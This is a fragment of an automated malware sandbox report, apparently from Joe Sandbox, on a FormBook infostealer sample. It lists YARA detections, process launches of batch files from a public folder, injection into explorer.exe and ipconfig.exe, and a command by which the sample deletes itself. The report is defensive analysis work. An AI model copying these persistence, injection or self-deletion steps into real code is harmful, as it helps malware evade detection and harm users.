                                                                      Jun 11, 2021 12:22:13.791188955 CEST162.159.135.233443192.168.2.349716CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                      CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:12:22:06
                                                                      Start date:11/06/2021
                                                                      Path:C:\Users\user\Desktop\3.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\3.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1081696 bytes
                                                                      MD5 hash:21F077FA0E739F6174E2452ABC30BB7C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.217187289.0000000003088000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215422596.0000000003068000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215851322.0000000003084000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215763701.000000000306C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215525181.0000000003080000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.216098891.0000000003098000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.215441416.0000000003084000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                      Reputation:low

                                                                      General

                                                                      Start time:12:22:26
                                                                      Start date:11/06/2021
                                                                      Path:C:\Users\user\Desktop\3.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\3.exe
                                                                      Imagebase:0x400000
                                                                      File size:1081696 bytes
                                                                      MD5 hash:21F077FA0E739F6174E2452ABC30BB7C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:12:22:27
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:28
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:33
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff714890000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:29
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:30
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:51
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                      Imagebase:0x830000
                                                                      File size:29184 bytes
                                                                      MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:22:56
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\3.exe'
                                                                      Imagebase:0xbd0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:22:56
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6b2800000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >